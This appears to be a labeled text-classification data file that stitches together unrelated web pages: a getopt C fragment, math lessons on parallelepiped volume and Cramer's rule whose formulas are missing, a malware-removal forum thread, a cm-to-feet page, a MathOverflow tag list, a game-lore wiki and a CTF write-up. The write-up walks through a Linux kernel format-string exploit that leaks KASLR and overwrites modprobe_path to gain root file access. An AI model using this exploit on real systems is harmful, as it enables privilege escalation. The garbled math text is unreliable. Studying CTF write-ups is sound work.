+ 1 < nargc && *nargv[optind + 1] != '-') optarg = nargv[++optind]; } place = EMSG; ++optind; } /* dump back option letter */ return (optchar); } /* * getopt -- * Parse argc/argv argument vector. * * [eventually this will replace the BSD getopt] */ int getopt(int nargc, char * const *nargv, const char *options) { /* * We don't pass FLAG_PERMUTE to getopt_internal() since * the BSD getopt(3) (unlike GNU) has never done this. * * Furthermore, since many privileged programs call getopt() * before dropping privileges it makes sense to keep things * as simple (and bug-free) as possible. */ return (getopt_internal(nargc, nargv, options, NULL, NULL, 0)); } /* * getopt_long -- * Parse argc/argv argument vector. */ int getopt_long(int nargc, char * const *nargv, const char *options, const struct option *long_options, int *idx) { return (getopt_internal(nargc, nargv, options, long_options, idx, FLAG_PERMUTE)); } /* * getopt_long_only -- * Parse argc/argv argument vector. */ int getopt_long_only(int nargc, char * const *nargv, const char *options, const struct option *long_options, int *idx) { return (getopt_internal(nargc, nargv, options, long_options, idx, FLAG_PERMUTE|FLAG_LONGONLY)); } #endif // REPLACE_GETOPT
__label__pos
0.929429
Call Us 07766496223 If a parallelogram is defined by two vectorsandthen the area of the parallelogram is defined by( Notewhereis the angle betweenand If the vectorsandare joined by a third vectorto form a solid shape, then the volume of the solid is the area of the base (which we may consider to be the area of the parallelepiped formed byand) multiplied by the height.is perpendicular to bothandso is in the direction of the vertical height. By taking the dot product ofwithand dividing bywe obtain the component ofperpendicular toThis is the height of the parallelpiped. Multiplying bygives the volume: This is illustrated below. If the vectorsare in the same plane, then they are linearly dependent, since three vectors in a two dimensional space are linearly dependent. They all lie in the same plane and the height of the parallelepiped is zero. If a matrix is formed with the columns or rows consisting of the three vectors, the determinant of this matrix will be zero since the vectors are linearly dependent.
__label__pos
0.841097
Linear Equations: Solutions Using Determinants with Three Variables The determinant of a 2 × 2 matrix is defined as follows: The determinant of a 3 × 3 matrix can be defined as shown in the following. Each minor determinant is obtained by crossing out the first column and one row. Example 1 Evaluate the following determinant. First find the minor determinants. The solution is To use determinants to solve a system of three equations with three variables (Cramer's Rule), say x, y, and z, four determinants must be formed following this procedure: 1. Write all equations in standard form. 2. Create the denominator determinant, D, by using the coefficients of x, y, and z from the equations and evaluate it.  3. Create the x‐numerator determinant, D x, the y‐numerator determinant, D y, and the z‐numerator determinant, D z, by replacing the respective x, y, and z coefficients with the constants from the equations in standard form and evaluate each determinant.  The answers for x, y, and z are as follows: Example 2 Solve this system of equations, using Cramer's Rule. Find the minor determinants. Use the constants to replace the x‐coefficients.  Use the constants to replace the y‐coefficients.  Use the constants to replace the z‐coefficients.  Therefore, The check is left to you. The solution is x = 1, y = –2, z = –3.  If the denominator determinant, D, has a value of zero, then the system is either inconsistent or dependent. The system is dependent if all the determinants have a value of zero. The system is inconsistent if at least one of the determinants, D x, D y, or D z, has a value not equal to zero and the denominator determinant has a value of zero.  Back to Top × REMOVED
__label__pos
0.999579
1. TechSpot is dedicated to computer enthusiasts and power users. Ask a question and give support. Join the community here. TechSpot is dedicated to computer enthusiasts and power users. Ask a question and give support. Join the community here, it only takes a minute. Dismiss Notice Yet another sirefef victim By peterpaleo · 21 replies Aug 9, 2012 1. Like many others, I have a problem with the sirefef rootkit and a rolling Microsoft Security Essentials restart. This seemed like the place to go.   2. Broni Broni Malware Annihilator Posts: 53,546   +358 Welcome aboard [​IMG] Please, observe following rules: • Read all of my instructions very carefully. Your mistakes during cleaning process may have very serious consequences, like unbootable computer. • If you're stuck, or you're not sure about certain step, always ask before doing anything else. • Please refrain from running any tools, fixes or applying any changes to your computer other than those I suggest. • Never run more than one scan at a time. • Keep updating me regarding your computer behavior, good, or bad. • The cleaning process, once started, has to be completed. Even if your computer appears to act better, it may still be infected. Once the computer is totally clean, I'll certainly let you know. • If you leave the topic without explanation in the middle of a cleaning process, you may not be eligible to receive any more help in malware removal forum. • I close my topics if you have not replied in 5 days. If you need more time, simply let me know. If I closed your topic and you need it to be reopened, simply PM me. ======================================= What Windows version?   3. peterpaleo peterpaleo TS Rookie Topic Starter I'm very sorry for having made this thread before reading the sticky. Unfortunately I used this computer for online banking and college forms, which means they might even have my SSN. If is safe to back anything up before I reinstall Windows 7 64-bit Home Premium or am I SOL?   4. Broni Broni Malware Annihilator Posts: 53,546   +358 Whatever you back up you have scan before you put it back on fresh install. Because you're infected with a rootkit make sure you FORMAT hard drive. If you don't format the rootkit will still be there. Keep in mind that regular recovery disks which are usually provided when you buy a computer do NOT format hard drive. Call all your financial institutions right away and make them being aware of your problem. Change all sensitive passwords right away using GOOD computer.   5. peterpaleo peterpaleo TS Rookie Topic Starter Okay. I'll do that. How do I reformat my hard drive? And ifI have an OEM version of Windows 7, then in this case will Microsoft allow me to reuse my key?   6. Broni Broni Malware Annihilator Posts: 53,546   +358 7. peterpaleo peterpaleo TS Rookie Topic Starter I have done a clean install. The files I backed up are on an external hard drive. How can I scan these files without compromising my computer?   8. Broni Broni Malware Annihilator Posts: 53,546   +358 Install Panda USB Vaccine, or BitDefender’s USB Immunizer on your computer to protect it from any infected USB device. Then you're safe to plug your external drive in. Make sure your Windows is updated, AV installed, firewall is up.   9. peterpaleo peterpaleo TS Rookie Topic Starter I've installed the Panda USB Vaccine.   10. Broni Broni Malware Annihilator Posts: 53,546   +358 Yes.   11. peterpaleo peterpaleo TS Rookie Topic Starter Sorry. I have my computer vaccinated.   12. Broni Broni Malware Annihilator Posts: 53,546   +358 That's fine.   13. peterpaleo peterpaleo TS Rookie Topic Starter Okay. Is there a program that I can download to scan the USB drive for the rootkit?   14. Broni Broni Malware Annihilator Posts: 53,546   +358 Any AV program will do.   15. peterpaleo peterpaleo TS Rookie Topic Starter Okay, I scanned it with AVG and it says it's entirely safe. I can't find any sort of way to dump a log, though.   16. Broni Broni Malware Annihilator Posts: 53,546   +358 I don't need it.   17. peterpaleo peterpaleo TS Rookie Topic Starter Okay. I guess I'll install Malwarebytes and call it a day. Thank you so much, Broni. You are a saint.   18. Broni Broni Malware Annihilator Posts: 53,546   +358 You're very welcome [​IMG]   19. peterpaleo peterpaleo TS Rookie Topic Starter I just did some research and it turns out that sirefef may have created a hidden partition. Is there any way to check for this?   20. Broni Broni Malware Annihilator Posts: 53,546   +358 If you formatted the drive it's not an issue.   21. peterpaleo peterpaleo TS Rookie Topic Starter I formatted it using the Windows CD, but I've read that the virus can insert itself into the MDR and create hidden partitions as well. Are you sure?   22. Broni Broni Malware Annihilator Posts: 53,546   +358 If you formatted a whole drive not just one partition you're fine.   Similar Topics Add New Comment You need to be a member to leave a comment. Join thousands of tech enthusiasts and participate. TechSpot Account You may also...
__label__pos
0.619974
Skip to main content plainclothes's user avatar plainclothes's user avatar plainclothes's user avatar plainclothes • Member for 11 years, 6 months • Last seen more than 4 years ago 1 vote Is it a good idea to expire passwords after a time relative to their complexity? 1 vote What are the pro's and con's of an extended user session? 1 vote Disable past dates or display error message? 1 vote How to distinguish between fields with similar values and no labels? 1 vote Accepted What is best for register section labels? "Your email" or "Email" 1 vote Where to put personalized recommendations feature? 1 vote Accepted Should the tap area be visible to users? 1 vote Scrolling vs "view more" in comments/ large text fields 1 vote How to optimize the UX process for projects with tight deadlines? 1 vote Best way to share from a Material design list 1 vote Accepted Naming convention for "admin" UI and "public facing" UI 1 vote How can I test a users decision to buy something? 1 vote When should users be notified of a pending password expiration 1 vote Frameworks for tagging user interview notes? 1 vote Should I implement a "Tags to exclude" field? 1 vote Is re-creating an art from someone else's art copyright violation and can be sued? 1 vote Determine scenario for task or let user decide? 1 vote Accepted How to apply the Pareto principle in UX design 1 vote In apartments or hotels why do we add a 0 between the floor number and room/apartment number? 1 vote Will users misunderstand "Last week", "Last year", "Last month" etc? 1 vote How does user's emotion relate to ux? 1 vote Android design with two-tier (primary and secondary) navigation 1 vote How to discourage users from using a feature? 1 vote What do you call a heuristic evaluation? 1 vote Accepted How to overlay multiple sets of quantitative data on a network? 1 vote Accepted Should I use multiple synchronized dropdowns in a big UI 1 vote Upload forms, should they open on a new page or in a pop-up box? 1 vote Best way to represent multilevel multiselect location dropdown 1 vote When conducting a tree test, is it ever okay to use keywords in the task that are present in the tree? 1 vote What is the initial state of an application called? 1 7 8 9 10 11 13
__label__pos
1
Posts GrabCON CTF 2021 - Paas [Pwn] Post Cancel GrabCON CTF 2021 - Paas [Pwn] Paas was a kernel exploitation challenge during GrabCON CTF 2021 that only got a single solve (our own). We are given a tarball and SSH access to a remote server. The compressed archive contains a shell script (run.sh) to launch a virtual machine using qemu-system-x86_64, a bzImage (the VM’s kernel), an initramfs directory (the VM’s filesystem), and a file named printf.c. The printf.c file contains the source of a Linux kernel module which registers a new system call with the number 548. This syscall accepts a single parameter, which is an array of strings; these will be used as parameters to what seems to be a regular printf function. We wrote the following program to test it: 1 2 3 4 5 6 7 8 9 10 #include <unistd.h> int main() { char* args[] = { "s1 -> %s\n", "s2", } syscall(548, args); } We copy it to the user’s home in the initramfs and we pack the new filesystem as instructed by the challenge author: 1 2 3 4 5 cd initramfs find . | cpio -o -H newc > ../initramfs.cpio cd .. gzip < initramfs.cpio > initramfs.cpio.gz rm -f initramfs.cpio We start the VM, cd into the home directory and launch the program, which prints to standard out the expected string: 1 2 ~ $ ./poc s1 -> s2 Inspecting the source for the kernel module, there does not seem to be any input checking, which makes this a format string challenge, with the particularity of it being in kernel space. We then can use %s for arbitrary reads, and %n for arbitrary writes. Before we read or write anything we must compute the kernel’s base address, as it is randomized due to KASLR. We used the perf_event_open technique (implemented here) to do so. Once we have the kernel’s base address, we can read or write any kernel structure by first computing its offset from the base address. Specifically, we are going to use a technique based in overwriting modprobe_path, as detailed here. In order to get the address of modprobe_path we need to debug the Linux kernel with symbols. To get symbols we use vmlinux-to-elf to extract the ELF file from the bzImage file. Next, we need to enable remote debugging and disable KASLR in order for the symbols to match their intended addresses; we do so by adding the -s -S flags and changing the kaslr option to nokaslr in the qemu command: 1 2 3 4 qemu-system-x86_64 \ -s -S \ -m 256M -initrd initramfs.cpio.gz -kernel ./bzImage \ -nographic -monitor /dev/null -append "kpti=1 +smep +smap nokaslr root=/dev/ram rw console=ttyS0 oops=panic paneic=1 quiet" 2>/dev/null The -s flag opens port 1234 for remote debugging, while -S will instruct the VM to freeze on startup so we can attach our debugger. We use the following gdb script to connect to the VM: 1 2 3 4 5 6 7 8 # Get symbols file client/kernel.elf # Connect target remote :1234 # Breakpoint on vulnerable syscall # We obtain its name by forcing a kernel crash and observing the stack trace # We can also grep /proc/kallsyms for `printf` inside the VM b __do_sys_printf We now modify our program to include the KASLR bypass technique mentioned above and again call the vulnerable syscall. Then, we launch qemu and gdb, type continue in gdb after hitting the VM freeze, and start our program: 1 2 3 4 ~ $ ./exploit [.] trying perf_event_open sampling ... lowest leaked address: ffffffff8105612a kernel base (likely): ffffffff81000000 The program now hits our breakpoint, which gives control back to gdb; at this point, we can obtain the address of modprobe_path: 1 2 (gdb) info address modprobe_path Symbol "modprobe_path" is at 0xffffffff8264ec60 in a file compiled without debugging. Therefore, the offset of modprobe_path is 0xffffffff8264ec60 - ffffffff81000000 = 0x164ec60. We can test this by running the following program and enabling KASLR: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 /* * KASLR leak stuff... */ /* * Read a location as a string */ void arb_read(uintptr_t ptr) { char* args[3] = {}; args[0] = "%p -> %s\n"; args[1] = ptr; args[2] = ptr; syscall(548, args); } int main() { unsigned long addr = get_kernel_addr_perf(); unsigned long kernel_base, modprobe_path; if (!addr) return 1; kernel_base = addr & 0xfffffffffff00000ul; modprobe_path = kernel_base + 0x164ec60; printf("modprobe_path: "); arb_read(modprobe_path); return 0; } 1 2 3 4 5 6 ~ $ ./exploit [.] trying perf_event_open sampling ... lowest leaked address: ffffffffaac5612a kernel base (possible): ffffffffaac00000 kernel base (possible): ffffffffaa000000 0xffffffffac24ec60 -> /sbin/modprobe At this point all we need to do is to overwrite modprobe_path and follow the steps detailed in kernel exploitation link above. As previously mentioned, we use %n for arbitrary writes, as with any other format string attack. The %n token writes to a certain location the amount of bytes written by printf up to that point. For example, if we were to write the byte 50 to some address, we would use the following format string: %50c%hn; %50c writes 50 characters to standard out, and %hn writes the number of previously written bytes (50) to the location pointed by the next parameter. The h modifier writes the specified amount as a short int (2 bytes); since we are writing single-byte amounts, this conveniently null-terminates our string without needing to make an additionall call. All of these behaviors are documented in the printf documentation. Finally, these are the steps of our exploit: 1. Leak the kernel base address. 2. Create a script in /home/user/x which will copy the flag to our home and make it readable. 3. Create a dummy binary file in /home/user/dummy with four 0xff bytes. 4. Overwrite modprobe_path. 5. Try to execute the dummy binary file. 6. Read the flag. You can find the full exploit here. 1 2 3 4 5 6 7 8 9 ~ $ ./exploit [.] trying perf_event_open sampling ... lowest leaked address: ffffffffb0c93132 kernel base (possible): ffffffffb0c00000 kernel base (possible): ffffffffb0000000 0xffffffffb224ec60 -> /sbin/modprobe 0xffffffffb224ec60 -> /home/user/x /home/user/dummy: line 1: ����: not found GrabCON{pr1n7f_1n_k3rn3l-4_b4d_1d34?} This post is licensed under CC BY 4.0 by the author.
__label__pos
0.900474
How to easily convert cm to feet and inches – what is 338 cm in feet and inches? You can easily convert 338 centimeters to feet and inches online. However, this is not the only easy method available. You can use conversion charts or even convert manually using a calculator.You can also create an excel sheet with converted values for easy comparison. Before answering your conversion question, it is important to understand that 1 foot is equal to 30.48 cm, 1 foot is equivalent to 12 inch while 1 inch is equal to 2.54 cm. Below, we have tabulated numerous values for you. We have also included an easy to use calculator for easy conversion. You can bookmark our site for future reference. What is 338 centimeters in feet and inches? |= 338 cm to ft. and in. = 338 * 0.3937/12 ft. rem * 03937/12 11 ft. 1.09999999999999 in. Conversion chart for centimeters to feet and inches Centimeters (cm); inches (") 1; 0.393701 2; 0.787402 3; 1.181103 4; 1.574804 5; 1.968505 6; 2.362206 7; 2.755907 8; 3.149608 9; 3.543309 10; 3.93701 Cm, in. and ft, are among the most commonly used length measurement units. They are used for length, width, height, circumference, radius, et cetera measurements, labeling, calculations and recording. Kilometers and miles are more popular in measurement of longer distances, while cm and ft are mostly used for measuring and recording of small distances and spaces. [raw_html_snippet id=”cm to inches”]
__label__pos
0.939777
The tag has no wiki summary. learn more… | top users | synonyms 39 votes 1answer 3k views Are the primes normally distributed? Or is this the Riemann hypothesis? Forgive my very naive question. I know next to nothing about number theory, but I'm curious about the state of the art on the distribution of primes. Let $\mathrm{Li}(x)$ be the offset logarithmic ... 24 votes 0answers 2k views When should we expect Tracy-Widom? The Tracy-Widom law describes, among other things, the fluctuations of maximal eigenvalues of many random large matrix models. Because of its universal character, it obtained his position on the ... 17 votes 0answers 498 views Erdos-Kac for squarefree numbers In its usual form, the Erdos-Kac Theorem states that if $f(n) : \mathbb{N} \rightarrow \mathbb{R}$ is a strongly additive function with $|f(p)| \le 1$ for all primes $p$, then $$\frac{|\{n \le x : ... 15 votes 1answer 792 views Riemann's $\zeta$ function and the uniform distribution on $[-1,0]$ http://math.stackexchange.com/questions/64566/riemanns-zeta-function-and-the-uniform-distribution-on-1-0 Stackexchange isn't getting really excited about this, so here it is. The $n$th cumulant of ... 14 votes 5answers 1k views A Normal Distribution Inequality Let $n(x) = \frac{1}{\sqrt{2\pi}} e^{-\frac{x^2}{2}}$, and $N(x) = \int_{-\infty}^x n(t)dt$. I have plotted the curves of the both sides of the following inequality. The graph shows that the following ... 14 votes 0answers 642 views On random Dirichlet distributions Fix a dimension $d\ge2$. Let $Q_d$ denote the positive quadrant of $\mathbb{R}^d$, that is, $Q_d$ is the set of points $\mathbf{x}=(x_i)_i$ in $\mathbb{R}^d$ such that $x_i>0$ for every $i$. ... 13 votes 2answers 388 views A probability distribution in n dimensional space which its projection on any line is a uniform distribution? Does there exist, for any natural $n$, a probability distribution in $\mathbb{R}^n$ whose projection on any line is a uniform distribution? 12 votes 1answer 625 views 2/3 power law in the plane I've recently come across a particular problem whose solution turns out to be a probability distribution given by $f(x) = \alpha \|x\|^{-2/3}$ in the unit disk in $\mathbb{R}^2$ and zero elsewhere (I ... 11 votes 1answer 747 views Does $P(X_1>X_2)$ and $P(X_1=X_2)$, where $X_1$ and $X_2$ are independent and Poisson distributed, uniquely determine the parameters? Let $X_1$ and $X_2$ be independent Poisson distributed random variables with parameters $\lambda_1$ and $\lambda_2$, respectively. Let $a = P(X_1 > X_2)$ and $b = P(X_1 = X_2)$. Question: ... 10 votes 2answers 430 views A Conjecture on the Density of a subset of integers Let $X$ denote the largest subset of odd integers with the property that every exponent in the prime factorization of any $x \in X$ belongs to $X$. The conjecture states that the density of $X$ among ... 10 votes 1answer 631 views Talagrand's concentration inequality with limited independence Is there a version of Talagrand's concentration inequality known when the variables have limited independence. More precisely, Let $F:\mathbb{R}^n \rightarrow \mathbb{R}$ be a $1$-Lipschitz convex ... 9 votes 1answer 632 views Montgomery's pair correlation function without RH? In the theory of the Riemann zeta function, Montgomery's Pair correlation function is defined as $$ F(\alpha) = \frac{1}{N(T)} \sum_{T < \gamma, \gamma' < 2T} T^{i \alpha (\gamma - \gamma')} ... 9 votes 2answers 559 views Random Trigonometric Polynomial Let $t_{1},t_{2},\ldots, t_{n}$ be i.i.d. real Gaussian random variables of zero mean and variance one. Let $a_{1},a_{2},\ldots, a_{n}$ be positive and fixed real numbers and define the random ... 9 votes 1answer 583 views Generalized central limit theorem I am looking for a generalized central limit theorem for non-square integrable stationary sequences. More precisely I suspect that when $(X_j)_{j\geqslant 1}$ is a stationary sequence such that $X_i$ ... 8 votes 4answers 889 views What structure is needed to define a Gaussian distribution on a given space? In most textbooks, the normal distribution is defined on $\mathbb{R}^n$ by specifying its probability density function. This works perfectly well, but it isn't really amenable to generalisation. I'm ... 8 votes 2answers 668 views What is the most extreme set 4 or 5 nontransitive n-sided dice? A set of nontransitive dice is a set of dice whose face numbers are such that the relation "is more likely to roll a higher number than" is not transitive. (See wikipedia) For some sets, the ... 8 votes 3answers 584 views Maximum of the expectation of maximum of Gaussian variables Suppose $X=(X_1,\ldots,X_n)$ is a Gaussian vector with each entry $X_i$ marginally distributed as $\mathcal{N}(0,1)$. Want to find out the possible maximum of $$\mathbb{E}\max_{1\le i\le n}|X_i|$$ and ... 8 votes 3answers 513 views A Variance-Tail Description for Continuous Probability Distributions Start with a continuous probability distribution given by a density function f(x). Let X be a real random variable whose distribution is given by the probability distribution. I would like to ask ... 8 votes 1answer 400 views Algorithm to produce random number with a gamma distribution I'd like to produce pseudo-random numbers with different distributions for a Monte Carlo simulation. I've got the poisson distribution working nicely with an algorithm from Knuth. I'm having trouble ... 8 votes 2answers 517 views Concentration bounds for sums of random variables of permutations I'm trying to find theorems regarding random variables derived from sampling permutations, specifically concentration bounds. As an example, let $X_i$ be the $\{0,1\}$-random variable that represents ... 8 votes 2answers 584 views Order statistics (e.g., minimum) of infinite collection of chi-square variates? Hi everyone, This is my first time here, so please let me know if I can clarify my question in any way (incl. formatting, tags, etc.). (And hopefully I can edit later!) I tried to find references, ... 8 votes 2answers 344 views An extension of Gaussian Isoperimetry The Gaussian isoperimetric inequality (Tsirelson,Sudakov, Borell) states that among all sets of given Gaussian measure in the n-dimensional Euclidean space, half-spaces have the minimal Gaussian ... 8 votes 2answers 347 views Entropy conjecture for distributions over $\mathbb{Z}_n$ Suppose we have two independent random variables $X$ (with distribution $p_X$) and $Y$ (with distribution $p_Y$) which take values in the cyclic group $\mathbb{Z}_n$. Let $Z = X +Y$, where the ... 7 votes 4answers 327 views Gaussian distributions as fixed points in Some distribution space I'm taking a course on topology and probabily. Today, the professor remarked something along the lines of: If you look at the space of probability distributions with $0$ mean and variance $1$, ... 7 votes 1answer 312 views Probability density that minimizes the sample range Let $\mathcal{F}$ denote the set of all "concave probability distributions" on the unit interval, that is, all functions $f:[0,1]\to \mathbb{R}$ such that $f$ is concave, $f(x)\geq 0$ for all $x\in ... 7 votes 7answers 567 views Semicircle law universality elsewhere Wigner's semicircle distribution is: $$f(x)=\frac{1}{2 \pi}\sqrt{4-x^2}, \ \ -2\leq x\leq 2.$$ Under reasonable conditions, the rescaled eigenvalue density of random symmetric matrices $M_n$ follows ... 7 votes 1answer 237 views Trasportation metric (AKA Earth-Mover's, Wasserstein, etc.) as “natural” / “induced”? Context: Given a discrete finite metric space $X$ (in my case X={0,1}$^n$ with the Hamming/L$_1$ distance), I need to define the natural or canonical metric on the set of all probability distributions ... 7 votes 2answers 224 views A moment problem Suppose $X, Y$ are two positive random variables such that $\mathbb{E}[X^\alpha] = \mathbb{E}[Y^\alpha]$ for all $\alpha \in (0, 1/2)$. It is also known that the first moment exists for each of them, ... 7 votes 2answers 417 views How to efficiently sample uniformly from the set of p-partitions of an n-set? Let $n,p \in \mathbb{N}_+$ with $p \leq n.$ Let $\mathcal{P}$ denote the set of partitions of $\{1, \ldots, n\}$ into $p$ nonempty sets. How can I efficiently sample uniformly from $\mathcal{P}$? 7 votes 1answer 372 views lower-bound for $Pr[X\geq EX]$ Given n random variables, $X_1, ..., X_n$, each takes value 0 or $a_i \in[0, 1]$. $X = \sum_{i=1}^n X_i$ and $EX \geq 1$ is the expected value of $X$. Can we get a lower-bound for $Pr[X \geq EX]$? It ... 7 votes 1answer 121 views Distribution of dropped objects Consider small perfectly elastic spheres being dropped from a fixed height in R^3, bouncing and coming to rest on the horizontal R^2. Assuming a reasonable distribution of minor perturbations of the ... 7 votes 1answer 213 views Concentration of sum of powers of normals Let $Z_1,Z_2,\ldots,Z_n$ be i.i.d. copies of a random variable $Z$ distributed as $\frac{1}{\sqrt{2}}X+i\frac{1}{\sqrt{2}}Y$ with $X$ and $Y$ independent standard Normal random variables ... 7 votes 1answer 151 views Distribution of entries of a doubly-sorted random matrix Take an $n \times n$ random matrix whose entries are i.i.d. with uniform distribution in $[0,1]$. Look at the sums of the elements of each row and then permute the rows so that these sums form an ... 7 votes 0answers 409 views 1-Wasserstein distance between two multivariate normal The $p$-Wasserstein between two measures $\nu_1$ and $\nu_2$ on $X$ is given by ... 7 votes 0answers 366 views Inequality between incomplete beta and gamma functions; or when is binomial distribution function above/below its limiting Poisson Please note: this question was posted first (September 4) in math.stackeschange.com and then (September 16) in stats.stackeschange.com. It got no answers in neither of those sites. Let the ... 6 votes 5answers 732 views Are these Two Definitions of ``Uniformly Distributed" Equivalent? For an article I am writing, I would like to know that two somewhat different looking conditions are in fact equivalent. Here is the setting. $X$ is a compact (and first countable) metric space and ... 6 votes 1answer 578 views Mean of i.i.d Random Variables With No Expected Value Let $X$ be an integer-valued random variable and let $X_n$ be the sum of $n$ independent realizations of $X$. I would like to understand the behavior of $X_n/n$ for large $n$ in some cases where $X$ ... 6 votes 1answer 113 views Is there an $\infty$ version of the Wasserstein distance between two distributions? If I have two probability distributions $\mu$ and $\nu$ defined on $X$ and $Y$ respectively, then the $p$-th Wasserstein distance between the two of them is defined as $$W_p(\mu,\nu) = ... 6 votes 1answer 255 views Reference on (discrete) log-concave probability distributions A discrete distribution $p$ over $\mathbb{N}$ is said to be log-concave if it satisfies the following conditions: The support of $p$ is a contiguous interval, i.e. $\exists a \leq b$ s.t. $p_i > ... 6 votes 2answers 294 views If Mean Residual Lifetime is approximately constant, Residual Lifetime is Approximately Exponential in a Strong Sense Suppose the "mean residual lifetime," $\mathbb{E}[X-x|X≥x]$ is approximately constant for large $x$. Then, I believe that the conditional tail distribution is approximately exponential, in the sense ... 6 votes 2answers 4k views Sum of Squares of Normal distributions Given $X_i \sim \mathcal{N}(\mu_i,\sigma_i^2)$, for $i = 1,\dots,n$. How does one find the distribution of $D = \sum_{i=1}^n X_i^2$? In the case that all the standard deviations are the same (i.e. ... 6 votes 2answers 266 views Small and large pieces of the plane, after countably many generic straight cuttings A delightful recent problem about disconnecting the plane by straight lines suggested me the following further question, that I can't resist to post. Let $\mathcal{F} $ be a countable family of ... 6 votes 1answer 1k views Probability distributions: The maximum of a pair of iid draws, where the minimum is an order statistic of other minimums? General question: What is the distribution for the maximum of 2 independent draws from cdf F(x), when we know that the minimum of those same two draws is the kth order statistic of the minimum of n ... 6 votes 2answers 142 views Geometric interpretation of the average of two independent Cauchy distributions Let me state two facts: (1) It is well known that if one takes a point uniformly distributed on the unit circle, and then takes it stereographic projection, the corresponding measure induced on the ... 6 votes 1answer 76 views Summability of ratios of moments a weight Recently, I encounter the following problem: Let $w$ be a probability density on $[0,1]$. Let mk be the $k$-th moment, i.e., $$m_k=\int_0^1t^kw(t)dt.$$ Under what condition can we have ... 6 votes 0answers 88 views Rate of Convergence of Compound Poisson Laws to Infinitely Divisible Laws It is known that every infinitely divisible random variable is the limit in law of a sequence of compound Poisson random variables (see for instance Theorem 1.2.18 of Lévy Processes and Stochastic ... 5 votes 1answer 1k views Convergence rate of the central limit theorem near the center of the distribution I'm looking for fast convergence rates for the central limit theorem - when we are not near the tails of the distribution. Specifically, from the general convergence rates stated in the Berry–Esseen ... 5 votes 2answers 2k views Convergence of moments implies convergence to normal distribution I have a sequence $\{X_n\}$ of random variables supported on the real line, as well as a normally distributed random variable $X$ (whose mean and variance are known but irrelevant). I know that the ... 5 votes 2answers 115 views Finding joint probability from double marginals Consider three probability distributions in the form $p_1(y,z),p_2(x,z),p_3(x,y)$. When does a global joint probability $p(x,y,z)$ (possibly not unique) exist? The first compatibility condition to ... 5 votes 3answers 386 views Estimating the Variance of a Discrete Normal Distribution Let $f(x; \sigma) = \frac{1}{\sigma\sqrt{2\pi}}\cdot e^{-\frac{x^2}{2\sigma^2}}$ be the probability density function of a normal distribution $\mathcal{N}(0, \sigma^2)$. We consider a discrete normal ...
__label__pos
0.939969
Jin'tulu From Age of Warscape Wiki Jump to: navigation, search Jin'tulu Jin'tulu.gif Details Leader Chieftain Rhanakhed Playable Yes Faction The Arbiters Average Height 6.4ft Skin Colours Green Blue Teal Black Hair Colours None (males) Black (females) Eye Colours Red/Orange Distinctive Features Horned Tail, Tall, Snout, Scales Languages Jin'ti English Life Span 50 years Diet Carnivorous Whenever you are in the Oozing Marsh.. watch your step. Those Jin'tulu have some incredibly crafty fighting-techniques. Plus, those spears really hurt.. ~ Forgelord Feezlebor The Jin'tulu race is a primary species appearing in Age of Warscape and Age of Warscape: Origins. They are one of the ten dominant races on Uloff, and are often found in Gaderon, specifically in the Oozing Marsh. The race specializes in unique battle techniques, such as "Ground Fighting", and the use of powders and poisons in combat. The race is currently led by Chieftain Rhanakhed, a powerful strategist and expert fighter. The Jin'tulu race is allied with The Arbiters, and is a playable species in the faction. History[edit | edit source] The Jin'tulu Emblem The Jin'tulu is said to have evolved from the native reptiles about two thousand years ago. Within the Oozing Marsh and Northern Fjordinheim, the race built their villages and began to flourish. They soon grew humanoid features, and began to build larger cities and developed tools and weapons. Soon, leaders were decided by a traditional public fight to the death. Whoever won this fight became the Chieftain of the race. They carried on until the early Humans came along. The Jin'tulu were interested in the race, and watched them build their civilizations. After becoming impressed by the races building skills, they would come out of the marsh with a peace offering. The Humans did not like it at first and were reluctant to accept the offering, but decided to welcome them. They had a great feast with traditional meals made by the Jin'tulu. Unfortunately, the Humans only brought themselves, and decided to not bring anything to the feast. Luckily, the Jin'tulu did not mind, as there was plenty of food for both races. The two races formed an alliance with each other, and gained a mutual friendship. The two also became trade partners, with the Humans trading armor, shields, weapons, food, and clothing; and the Jin'tulu trading poison, spears, clothing, helmets, and their traditional food. Appearance[edit | edit source] Jintulu2.jpg Jin'tulu resemble that of anthropomorphic lizards. The average Jin'tulu is 140 lbs., and will usually measure up to 6 feet tall. Humans and Jin'tulu do not differ too greatly, despite one being mammal and one being reptile. The Jin'tulu are reptilian, covered in scales. They are mostly teal or green, but those who are out in the sun gain black colored scales, eventually. Their eyes are similar to that of the Madagascar Velvet Gecko, having narrow black pupils, met by a red and orange color around it. The male Jin'tulu has a larger snout than the female Jin'tulu. The females are also known to have slick, black hair, thin tails, short snouts, and smaller teeth. The males are known to have horns on the back of their bodies, sharper fingernails, and a lack in any body-hair. Both genders have a digitigrade stance. Males are often seen with a much broader shoulders, and a larger body frame overall. Personality[edit | edit source] Jin'tulu are known to be aggressive in battle. They get straight to the point, and few show emotion. They use special combat tactics such as "Ground-Fighting", which is a technique that usually consists of burrowing underground, wait for enemies to get near their spot, and jab them with sharp spears. Poison that induces writhing pain is their signature weapon, and will usually coat their weapons in this poison. Jin'tulu also seek to establish good relationships with other races, as they believe that good relationships result a better society. Leadership & Government[edit | edit source] Chieftain Rhanakhed, the current cheftain of the Jin'tulu Their leader is currently Chieftain Rhanakhed. He is quite old, but skilled in fighting. Rhanakhed is known to be aggressive in combat, and will do anything to keep his people safe and secure. He does not normally get along with other race leaders (except Human leader King Earnet), but tries to tolerate anyone he is allied with. He is known to get along with King Earnet quite well, as they both share similar ideals and combat techniques. The Jin'tulu have a clan-like government, with a chieftain in charge of the race. The chieftain is responsible for all the decisions of the race, and hold the responsibilities of keeping the people happy, alive, and healthy. Every few years, there is a ceremonial arena battle in which they decide the next chieftain. The current chieftain is to fight against Jin'tulu who desire on becoming the next chieftain. These battles will usually result in one opponent dying. Culture[edit | edit source] The Jin'tulu are very tribal, and love fine-art and crafting. They also create traditional music, which is made with chants, humms, and tribal instruments. They are also known to love painting and art, and will proudly display their creations everywhere. Jin'tulu also have a reputation for using chemicals and mixtures to create a signature poison, which invokes heavy irritation and writhing pain. The poison can also be fatal if it gets into the bloodstream. Jin'tulu will often use sticks, rocks, and twine to create weapons. These weapons will usually be sharpened, and will commonly be very spear-like. They will trade for higher quality weapons when preparing for an oncoming battle. Their armor can range from copper and tin to highly durable metals that they create themselves, the latter usually reserved for the Chieftan and his guard.
__label__pos
0.822559
